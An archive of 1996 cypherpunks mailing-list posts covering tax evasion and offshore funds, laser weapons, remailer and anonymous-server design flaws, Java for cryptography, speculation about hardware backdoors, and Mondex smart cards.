http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Loomis <ml3e+@andrew.cmu.edu>
Date: Fri, 26 Apr 1996 22:49:06 +0800
To: cypherpunks@toad.com
Subject: Re: US law - World Law - Secret Banking
In-Reply-To: <ada59fc1270210048d39@[205.199.118.202]>
Message-ID: <UlU8SES00iWV80j2lz@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 25-Apr-96 Re: US law - World Law -
Se.. by Timothy C. May@got.net 
> I 'm convinced that a similar argument applies to those transferring funds.
> Many funds transfers are not even tax evasion; I am one of many people who
> are researching ways to expatriate some or all of my funds to jurisdictions
> friendlier than the U.S. So long as I fill out the proper boxes on my 1040,
> and pay appropriate taxes, I am committing no crime by moving my wealth to
> some other country.
> 
> Those on the list about a year or so ago may recall that there are
> proposals to in fact impose a "capital flight tax." This would make the
> U.S. a country very much like the former Soviet Union, which forbade such
> transfers of wealth without payment of heavy taxes.

    I have been reading this list to get an idea where Declan gets some
of his lunatic ideas and what Rich Graves says when he is not up to
Holocaust fetishism.  Despite Timothy's claim to the contrary, it seems
that the basic point of this list is some libertarian notion that tax
evasion is a good thing.  While I am not clear how serious of threat, if
one at all, to a system of fair taxiation, since much of the talk could
be simply bluff, I have been made glad for the first time for the War on
Drugs.  This silly war--tragic in terms of its economic cost and its
assault on liberty--at least has forces some government agencies to take
you seriously enough to figure out how to derail your plans of tax
evasion.

Michael Loomis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sat, 27 Apr 1996 04:40:36 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: [NOISE] What is "laser material"?
In-Reply-To: <199604260403.VAA23917@netcom9.netcom.com>
Message-ID: <3180C174.4DC4@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:

> >   Moreover, a laser shot costs $3,000, compared to several
> >   million dollars for a missile. Army officials envision the
> >   Nautilus would be beamed from a truck capable of firing 50
> >   shots before requiring more laser material.
> 
> Does anyone have any idea what "more laser material" means?

It's this fluorescent goopy stuff, very sticky and tough to handle; I 
hear it smells *awful* too.  They have to use big compressors to pack
it into the laser tubes.  That's one of the reason lasers require so
much power.

Curiously, the popular novelty product "Silly String" is in fact a 
scaled-down "domestic" version of real laser technology.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 27 Apr 1996 08:56:52 +0800
To: cypherpunks@toad.com
Subject: RE: Mindshare and Java
Message-ID: <v02120d0bada61e532f13@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:06 4/25/96, James Childers wrote:
>> > As cool as many of the people on the Java team are, though, I am dubious
>> > that Java is going to live up to the hype.
>
>Same here. If someone writes a secure electronic-wallet type system
>with Java, then I'll be impressed. Until then, all I've seen
>implemented is kEWL text graphics.

Well, Sun just did unveil their Java Wallet. Specs are hazy at this time,
but the slides I saw at the FSTC conference last week looked promising.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sat, 27 Apr 1996 09:39:54 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] What is "laser material"?
Message-ID: <v01540b00ada697d870e0@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>At 4:05 AM 4/26/96, Bill Frantz wrote:
>
>>>   Moreover, a laser shot costs $3,000, compared to several
>>>   million dollars for a missile. Army officials envision the
>>>   Nautilus would be beamed from a truck capable of firing 50
>>>   shots before requiring more laser material.
>>
>>Does anyone have any idea what "more laser material" means?
>>
>
>Sure, most high-power lasers like this are chemical lasers, consuming
>reactive materials.
>
>(This is not the same as "gas lasers," a la the early CO2 lasers. And of
>course ruby and Nd-YAG lasers are not what is meant here, either.)
>
>P.S. I don't place much faith in laser weaponry. Some obvious
>countermeasures are: spin the projectile to minimize heating of any one
>spot, determine the wavelength of the planned laser and coat the projectile
>with a suitably reflective coating, apply ablative layers that can burn off
>without harm, etc. Such countermeasures are of course well-known to the
>laser builders, but they still make the game much tougher. All a matter of
>attack and counter-attack, and the costs of each. Like castles and siege
>engines. Or like crypto.
>
>--Tim May

Other problems include tracking the missile accurately for the one or two
seconds (that's likely to be a mile or so if it's anything like a Scud) and
handling the dispersive effect of the air temperature gradient caused by
the laser itself.


-------------------------------------------------------------------------
Steven Weller                      |  Weller's three steps to Greatness:
                                   |     1. See what others cannot
                                   |     2. Think what others cannot
stevenw@best.com                   |     3. Express what others cannot






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Sat, 27 Apr 1996 07:16:53 +0800
To: cypherpunks@toad.com
Subject: Re: PGP + Pegasus Mail
Message-ID: <2.2.32.19960426134001.006b6c3c@tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:50 PM 4/26/96 +0000, G Ackerman wrote:
>Hi,
>
>I want to know if it is possible -  and how to use PGP from within 
>Pmail.  (I want to use the Encrypt option in PMail with a method PGP 
>- is it possible and what must I do to get it to work) (including Digital 
>Signature, etc)

I don't know the answer to this question, but there is a pgp-users
mailing list where someone might know.  Here's how to subscribe:

	"To subscribe to the list, simply e-mail "pgp-users-request
@rivertown.net" with the word "subscribe" in the subject **NOT THE BODY** of
the e-mail and you will be automatically subscribed to the list. To
subscribe to the digest, sent your request to "pgp-users-d-
request@rivertown.net" and your subscription will be likewise processed.
Depending on list volume, digests will go out from once a day to several
times a day."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 27 Apr 1996 07:20:43 +0800
To: cypherpunks@toad.com
Subject: Bytes
Message-ID: <199604261341.JAA01486@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   May BYTE reports on topics seen here:


   Peter Wayner's deft assay of "Entrust," Nortel's E-mail
   encryption program. "An easy tool for securing E-mail
   unlocks the door to managing public and private keys."

   Michael Shoffner on "Java's Busting Out All Over."

   Andrew Davis on "A Digital Signal Processor Sampler."

   Rex Baldazo on the Be Operating System -- multiprocessing,
   multi-threaded and object-oriented -- "buzzword-compliant."

   Doug Anderson on the high-speed Fibre Channel network
   system.

   Among several other fine pieces.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sat, 27 Apr 1996 12:06:58 +0800
To: cypherpunks@toad.com
Subject: Re: Mixmaster message formats
In-Reply-To: <Pine.LNX.3.92.960425200950.1060A-100000@gak>
Message-ID: <318104E5.2779929F@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I was thinking about how Mixmaster needs a separate message format so it
> can make messages a fixed size and add a packet ID.  However, couldn't all
> this be done with PGP?  With PGP, the length of the file being encrypted is
> encrypted itself, so it would be possible to append random data to the end
> of the file to make the message a fixed length like Mixmaster.  Also, the
> packet-ID could be implemented by putting a line such as the following in the
> message:
> 
> ::
> Packet-ID: foobar
> 
> The only other thing that would have to be taken care of is chaining.  The
> way I could see this working is to have a header in the encrypted message that
> tells the remailer whether it should de-armor the message at the next layer,
> append random data, then re-armor, and pass it to the next remailer.  Am I
> missing something?

Yes. When an intermediate message is decrypted, the real message becomes
readable, but the random bytes stay random. Thus, your proposal is
secure against attacks on the link, but fails to attacks on the nodes
(i.e. reveals just as information as if padding had not been used).

I was suffering from the same confusion myself until fairly recently. I
even made a proposal for text-based type-3 remailer formats, which
contained this flaw.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Sat, 27 Apr 1996 07:45:15 +0800
To: cypherpunks@toad.com
Subject: Tcl Crypto [Was Re: Mindshare and Java]
In-Reply-To: <Pine.SUN.3.91.960425153148.12377C-100000@rwd.goucher.edu>
Message-ID: <9604261417.AA20312@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain



> The next phase will be to write (what I beleive to be) the first graphical
> PGP shell for X.

	Depends on what you mean by graphical PGP shell, but no.  Exmh
(Tk front end for the MH mail reader) has had PGP support for ages.

> I don't think TCL is suited to heavy-duty crypto applications, except as 
> an interface. Mostly because it is interpreted, though I'm not sure how 
> "everything is a string" would affect bignums. (And I wouldn't want to 
> write a TCL bignum library...)

	IF you really wanted to do such a thing, the best aproach would
be to do it as a C extension (so it could be dynamically loaded with
the new dl support) or if you're a real massochist do it in [incr tcl]
so that the bignums are objects (of a sort).

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Apr 1996 11:05:56 +0800
To: Rick Smith <smith@sctc.com>
Subject: Re: trusting the processor chip
Message-ID: <m0uCrFs-0008y2C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 AM 4/26/96 -0500, Rick Smith wrote:
>Having penned the response to Jeffrey Flinn on the unlikelihood of
>processor back doors, I'll comment on jim bell's response:

>> More likely,I think, an organization like the NSA 
>>might build a pin-compatible version of an existing, commonly-used product 
>>like a keyboard encoder chip that is designed to transmit (by RFI signals) 
>>the contents of what is typed at the keyboard.  It's simple, it's hard to 
>>detect, and it gets what they want.
>
>Simple, no.

By NSA standards, it is simple.  NSA has probably had its own semiconductor 
fabs for 30+ years.  Even if we assume that their capabilities lag 
commercial production in terms of density or quality, keyboard encoder chips 
were trivial 20+ years ago and could presumably be easily 
duplicated/modified today by even the oldest operating fabs.  They probably 
had far less than 10,000 transistors.  Even modern keyboard controllers 
probably "waste"  a microcontroller with far more capability than you'd need 
for the task, and microcontrollers usually have substantially more code area 
than would be necessary to add some sort of surreptitious function.

>Hard to detect, somewhat.

You'd have to know what to look for.


>Gets what they want, unclear.

If there was one single data stream you'd like to get, it's the keyboard.  
This doesn't get you everything, but close.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 27 Apr 1996 08:10:49 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Is the public involved in the crypto policy debate?
Message-ID: <199604261433.KAA13991@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 26, 1996 02:05:40, 'tcmay@got.net (Timothy C. May)' wrote: 
 
> 
>(If we were leftist theoreticians, we could debate for years or even 
>decades whether our movement is truly a mass movement, or just a vanguard 
>movement, etc.) 
> 
>--Tim May 
> 
 
I do not mind being trolled from time to time. 
 
Based on my anthropological, political, and journalistic researches, I look
at cypherpunks as a heterogeneous, not homogenous, movement. By this, I
mean that it can be examined in a variety of ways based on significantly
different points. 
 
1) Development (more accurately spread) of public key crypto: definitely
vanguard. 
 
2) Development and spread of anon remailers: definitely vanguard. 
 
3) Opposition to CDA, etc.: Part of a smallish mass movement. Participation
in the movement definitely limited to a small number of issues involved.
E.G. good contributions to publicity; no contribution to issues of mass
sexual hysteria around "kiddie porn," etc. 
 
4) Other issues, like future role of e-cash, etc. Not vanguard, not mass
movement, a "bunch of loons." 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Sat, 27 Apr 1996 12:31:41 +0800
To: jimbell@pacifier.com
Subject: Re: trusting the processor chip
Message-ID: <199604261550.KAA20217@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Having penned the response to Jeffrey Flinn on the unlikelihood of
processor back doors, I'll comment on jim bell's response:

>This analysis seems to assume that the entire production run of a standard 
>product is subverted. 

Actually, I perceived two models: either all processors are subverted
or a subset of them are. Both require a reasonably complete design
team to reliably achieve the objective of a well hidden and reliable
back door. The cost effective thing to do is use the original design
team since they have the knowledge you need to pull it off. A
different and/or much smaller team has a lower likelihood of success.

> More likely,I think, an organization like the NSA 
>might build a pin-compatible version of an existing, commonly-used product 
>like a keyboard encoder chip that is designed to transmit (by RFI signals) 
>the contents of what is typed at the keyboard.  It's simple, it's hard to 
>detect, and it gets what they want.

Simple, no. Hard to detect, somewhat. Gets what they want, unclear.

My experience with processor design and development is rather ancient
and my knowledge of IC work is third hand, so I'll gladly defer to
someone with closer knowledge of the process (Tim?).  However, I've
never heard anything to imply that a processor architecture can be
cleverly and reliably dinked with in this manner without lots of
expensive engineering. Where does the chip real estate come from?  Is
there room in the microcode for this? Will it destabilize other
behaviors? Will the victim detect it through RFI testing?

No, it's not impossible. The risk vs reward tradeoff is shaky.

Rick.
smith@sctc.com        secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 27 Apr 1996 13:21:05 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] What is "laser material"?
Message-ID: <2.2.32.19960426175657.00ae9254@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 PM 4/25/96 -0700, Bill Frantz wrote:

>>   Moreover, a laser shot costs $3,000, compared to several
>>   million dollars for a missile. Army officials envision the
>>   Nautilus would be beamed from a truck capable of firing 50
>>   shots before requiring more laser material. 
>
>Does anyone have any idea what "more laser material" means?

It means that the laser burns itself up when fired.  Either they are pumping
gas into the laser and eventually run out or they are using something that
is solid or semi-solid (yes, you can make a laser out of Jello!) that
becomes non-functional after a certain number of uses.

The plans I have for a somewhat high powered laser (10 watts) requires
nitrogen pumped through the tube.  Run out of nitrogen and you run out of
laser...

The problem with laser based weapons is they are weather dependant.  Try
using a laser in the rain and see how coherent a beam you get.

What this has to do with crypto, I have no idea...  (Maybe they are going to
try and etch RSA in four lines of Perl into the side of the whitehouse.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Sat, 27 Apr 1996 10:35:15 +0800
To: cwe@it.kth.se
Subject: Re: trusting the processor chip
Message-ID: <199604261557.KAA20525@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


cwe@it.kth.se (Christian Wettergren) writes:

>Take a look at the IEEE Symp on Security and Privacy Proceedings from
>1995, I believe it was. There was a paper there about security bugs in
>the Intel processors, enumerating a number of them in 80386 for example.
>There where at least one or two byte sequences that plainly stopped 
>the processor.

Yes, and this is where the real risks are. The original question was
entirely about explicit subversion. The larger risk is accidental
flaws. Same with software in most cases.

Rick.
smith@sctc.com           secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Sat, 27 Apr 1996 00:24:05 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: trusting the processor chip
In-Reply-To: <Pine.3.89.9604252347.A18926-0100000@netcom13>
Message-ID: <199604260901.LAA22411@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



Take a look at the IEEE Symp on Security and Privacy Proceedings from
1995, I believe it was. There was a paper there about security bugs in
the Intel processors, enumerating a number of them in 80386 for example.
There where at least one or two byte sequences that plainly stopped 
the processor.

[I'll find the reference, I have it back home.]

The authors concluded that the number of released bugs reports had
dimished over time for each processor model, and for the Pentium not 
a single one had been released. They speculated whether it was considered 
company confidential perhaps?

They "promised" to build their own "processor tester" to try to find
the most obvious ones at least. But it will be very hard to find all of
these bugs, judging from the released bugs. Some of them are only 
appearing sporadically under a pretty complicated set of circumstances,
like what is in the pipeline, the cache etc...

The processor is ever important, if it is illdefined or flakey, it is
almost impossible to build security on top of it.

/Christian









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Apr 1996 11:33:27 +0800
To: cypherpunks@toad.com
Subject: Re: trusting the processor chip
Message-ID: <ada655e33202100457c6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:01 AM 4/26/96, Christian Wettergren wrote:
...
>They "promised" to build their own "processor tester" to try to find
>the most obvious ones at least. But it will be very hard to find all of
>these bugs, judging from the released bugs. Some of them are only
>appearing sporadically under a pretty complicated set of circumstances,
>like what is in the pipeline, the cache etc...
>
>The processor is ever important, if it is illdefined or flakey, it is
>almost impossible to build security on top of it.

Maybe true in theory, under special circumstances, but not something of
immediate importance. Finding bugs is important, but no modern processor
chip set (including the peripheral chips) is likely to be "100% secure,"
whatever that means. (The NSA and its minions put out the "Rainbow Books"
to define this, and few machines come close to the top rating...)

There was a British plan some years back to develop a "provably secure"
microprocessor for life-critical applications, e.g. train controllers. It
was called "Viper." Last I heard, the project was not progressing.

It seems that most people would rather use the hundreds of MIPS of
processing power of a modern, high-density processor that the sub-MIPS
power of a Viper-type chip.

(I'm not of course saying that processing power and security are inverses
of each other, only noting that they haven't gone together so far.)

The most famed chip flaw of all time had no security implications, nor
would it ever have affected a single life. (Except stock market lives.) I'm
glad Intel offered a recall and fixed the bug, but the plain fact is that
the bug truly was obscure and could only be demonstrated under contrived
conditions.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Apr 1996 12:01:21 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: US law - World Law - Secret Banking
Message-ID: <m0uCsKG-000989C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:13 AM 4/26/96 -0700, Rich Graves wrote:

>On Fri, 26 Apr 1996, Michael Loomis wrote:
>
>>     I have been reading this list to get an idea where Declan gets some
>> of his lunatic ideas and what Rich Graves says when he is not up to
>> Holocaust fetishism.  Despite Timothy's claim to the contrary, it seems
>> that the basic point of this list is some libertarian notion that tax
>> evasion is a good thing.
>
>That might be one view, but not mine. I think people who evade income
>taxes are bad -- they're stealing from the rest of society.

If a criminal mugs you for $10 each morning for a month, and on the 32nd day you 
decide you've had enough and pull a gun and defend yourself, does that mean 
that you're stealing from him?!?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 27 Apr 1996 09:55:07 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: The need for coderpunks
In-Reply-To: <199604260527.WAA02314@netcom8.netcom.com>
Message-ID: <Pine.3.89.9604261105.A17571-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 25 Apr 1996, Mike Duvos wrote:

> Given the various parameters which determine the life and death
> of mailing lists, I fully expect Coderpunks to become moribund
> within six months, and its members to reunify with this list.
> 
> Very few of these "I'm going to start my own list with less
> noise" adventures ever make it long term, absent the
> personalities and critical mass of interesting information which
> drove the list they spun off from.

In this case, I hope not. There are people (not myself) who only want 
the coding-related material arriving in their mailboxes. Coderpunks 
serves that need. I think that particular list is more of a filter than a 
separate list. If you look at the archives (if they come back up) you'll
see a few crypto bigwigs on coderpunks that haven't seen fit to post to 
cypherpunks in a very long time, if ever. It'd be nice to keep 
receiving their input without forcing them into tedious killfiling measures.
Conversely, I don't see why the activists should have to deal with code.

The main list, imho, has mostly become something of a watering hole for 
the primary crypto user community. Something quite different from the usenet 
crypto groups.

And since the list is very active regardless of signal, it will still be 
a place to send out some signal on those occasions where the important 
thngs occur. They don't (and can't) every day. And usenet just doesn't 
perform this function properly. 

I really do think having archives alongside a cypherpunks archive is crucial
for the survival of an offshoot list. Institutional memory is very 
useful, especially for time-insensitive things like technical discussions.
If hks decides not to bring back the archives, I hope they tell us promptly
and temporarily put the whole thing up for ftp so someone else can 
provide this valuable service. (Kudos to hks and Todd for having given to us 
up till now.)

It's safe for you to unsubscribe now, Perry.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Apr 1996 13:31:26 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <199604261849.LAA02981@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May and Mike Duvos have expresses an enthusiasm for Java which I share.
 There are a few practical issues which should be addresses.

Mike says:
>Indeed, with Java, I can put up a Web page which teaches someone
>about a cryptographic algorithm, allows him to try it out and run
>sample data through it, and provides him with a
>platform-independent implementation of it to use as he wishes.
>All in one fell swoop.  That's a pretty powerful concept.

But with the #$%^& ITAR you have to do it outside the USA/Canada, or limit
it to USA/Canadians.  The patent situation with RSA doesn't help making
applications inter-operate with the existing PGP based infrastructure. 
Perhaps all these applications will appear first on the outside, where
these problems do not exist for the developers.  (The patent problem would
still exist for US/Canadian users.  I will be interested to see the patent
holder's response.)

Tim says:
>One interesting remark I read from someone was that the Java distribution
>model returns us to an era of easier distribution of small programs. The
>"application bloat" of very large programs may be at least partly fixed.
>We'll see.

I have my doubts about this one.  I think application bloat comes from
market forces and from the kind of bundling you see in XYZCorpOffice
products where you get 4 applications packaged together.  This marketing
approach maximizes revenue by selling you products you don't need as a
matter of convenience.  But, we shall see.


There are some features of Java which make it less than ideal for crypto
applications.  These features can be overcome, but they will affect
implementors and users.

(1) There are not many sources of high-quality entropy available to Java
applets.  Keystroke timings and scribble windows are probably the best
sources, but may represent an inconvenience for users.

(2) Java doesn't allow you to define operators as methods of classes.  This
feature has the advantage that you don't have strange uses of the
operators, the classic example being the left shift operator being used to
do output.  However, if you need to do arithmetic on numbers larger than 64
bits, you can't use common, infix notation.  This feature only affects
developers, and at worst, qualifies as a pain in the rear and not a show
stopper.

I too hope to soon see high-quality crypto applications on my desktop in Java.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 27 Apr 1996 13:21:17 +0800
To: cypherpunks@toad.com
Subject: Re: An idea for refining penet-style anonymous servers
Message-ID: <199604261849.LAA03012@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:15 AM 4/25/96 -0700, Alan Bostick wrote:
>The other night, while sick and feverish with the flu, a scheme popped
>into my head that would seem to make penet-style anonymous servers less
>vulnerable to compromise through seizure of the remailer equipment or of
>the address database...
>
>My scheme is the design of the address database.  It consists of two
>hash tables, one for sending messages (which maps anonymous IDs onto
>sender's addresses), and one for receiving them (mapping recipient's
>addresses onto anonymous IDs).  A cryptographically secure hash (say,
>MD5) is used for the index of both tables.
>
>The index of the sending message table is the MD5 hash of the sender's
>address.  The table entry the index points to is the sender's anonymous
>ID, encrypted by a symmetric algorithm (maybe IDEA).  The encryption key
>would be a different hash, by another algorithm (let's suppose it's
>SHA), of that same address.
>
>...
>
>The receiving message hash table is designed similarly, in reverse.  The
>index of the hash table is the MD5 hash of the anonymous ID; the entry
>in the table is the recipient's email address, encrypted with the SHA
>hash of the anonymous ID...

Assuming you have obtained the address database, it seems to me that this
scheme is subject to known address attacks:

(1) If you want to find out what newbie@slowresponse.com's anon ID is, you
just look it up.

(2) If you want to find out the real email addresses of all the users, you
test all the anon-ids with the reverse lookup table.  This attack could be
defeated by using sufficiently long random anon-ids.  If we assume 5 bits
of information/character, a 96 bit anon-id (sufficient to preclude
exhaustive search attacks) would require 19 character anon-ids.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 27 Apr 1996 09:26:10 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Mondex
Message-ID: <Pine.SUN.3.91.960426114940.17586A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Seth Godin, Presenting Digital Cash (1995) reports on p. 94:

Mondex "spent four years developing state-of-the-art protection against 
reverse engineering by finding the world's best reverse engineers and 
give them [sic] a shot a cracking the chip in their smart cards."

==details anyone?

Elsewhere, in the interview in the Appendix, Tim Jones admits they are 
currently vulnerable to a MITM attack, but promises a fix real soon.

<>
In other Mondex news, the American Banker newspaper reports they are going
to field test a card in a British university; it will do meals, copies,
etc... 

Any other Mondex news around?


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <ptrei@ACM.ORG>
Date: Sat, 27 Apr 1996 09:59:39 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Guardian angels, the decency brigade, and cyberserap
Message-ID: <199604261605.JAA20253@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Moderately innocuous, self-justifying letter mostly deleted]
> 
> CyberAngels is about self-regulation.  Let us not confuse the fight against
> internet crime with the criminalization of free speech.  We propose the
> former not the latter.
> 
> Gabriel
> 
> *************************************************************************
> "All that is required for the triumph of evil is that good men
> and women remain silent and do nothing" (Edmund Burke)
> 
> "Congress shall make no law respecting an establishment
> of religion or prohibiting the free exercise thereof; or
> abridging the freedom of speech, or of the press; or the
> right of the people peaceably to assemble and to petition
> the Government for a redress of grievances."
> (US First Amendment to the Constitution)
> 
> "Those who sacrifice security for freedom, will have neither"
>***********************************************************************

It's this last sig-quote that bothers me. It's worth noting that, unlike
the other two, it has no attribution. It looks like an inversion of 
Benjamin Franklin's: 

" They that can give up essential liberty to obtain a little temporary safety 
  deserve neither liberty nor safety." 
         - Historical Review of Pennsylvania

People usually put in their .sigs quotes they feel sum up their personal
philiosophy. I guess soon we'll see 'Gabriel' give us some more words
to live by; these may be right up his alley:

"War is Peace"
"Ignorance is Strength"
"Freedom is Slavery"
	- Orwell, "1984"

Gabriel's also misquoting Burke - the actual text is:
"The only thing necessary for the triumph of evil is for good people to do nothing. "

Peter Trei
ptrei@acm.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 27 Apr 1996 10:35:35 +0800
To: Michael Loomis <ml3e+@andrew.cmu.edu>
Subject: Re: US law - World Law - Secret Banking
In-Reply-To: <UlU8SES00iWV80j2lz@andrew.cmu.edu>
Message-ID: <Pine.3.89.9604261141.B17571-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 26 Apr 1996, Michael Loomis wrote:

>     I have been reading this list to get an idea where Declan gets some
> of his lunatic ideas and what Rich Graves says when he is not up to
> Holocaust fetishism.  Despite Timothy's claim to the contrary, it seems
> that the basic point of this list is some libertarian notion that tax
> evasion is a good thing.  While I am not clear how serious of threat, if

If Tim is claiming anything to the contrary it is the importance of defending
tax evasion on this list. There isn't any. Its acceptance is a foregone 
conclusion around here. The place for debating the ethics of such 
things is on usenet political groups. The focus here is using crypto to build
the institutions to escape the constraints of physical commerce and 
monitoring. Obviously, for the practical purposes of most people we 
aren't there yet. It's quite promising, though. It's not the "why" but 
the "how". 

It might be useful for you to browse the early portions of the archives 
when they come back or read Tim's and Eric's original manifestos
(somewhere in the bowels of ftp.csua.berkeley.edu/pub/cypherpunks/rants)
and Black Unicorn's essay on his love of cash from Detweiler's page
(can't remeber the url, I'll dig it up if you're interested, it's got
some nice outtakes from past discussions, though Det himself is 
rather out of it). The cyphernomicon is also instructive (it'll show up 
on search engines). There are tons of other good sources, too. 

Ps. I know there are other list archives, but none of the urls I dig up 
seem to work. Help!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Sat, 27 Apr 1996 11:13:32 +0800
To: cypherpunks@toad.com
Subject: APPLIED CRYPTOGRAPHY 2nd EDITION Errata version 1.3
Message-ID: <199604261718.MAA20147@parka>
MIME-Version: 1.0
Content-Type: text


I just mailed a copy of the new errata to everyone on my mailing list.  If
you didn't get one, it means that you are not on my mailing list.  Send
me e-mail to correct that oversight immediately.

Wiley has not yet committed to making an updated version of the book.  If
you want to complain to my editor, he is psutherl@jwiley.com.

Bruce

**************************************************************************
* Bruce Schneier              APPLIED CRYPTOGRAPHY, 2nd EDITION is
* Counterpane Systems         available.  For info on a 15%
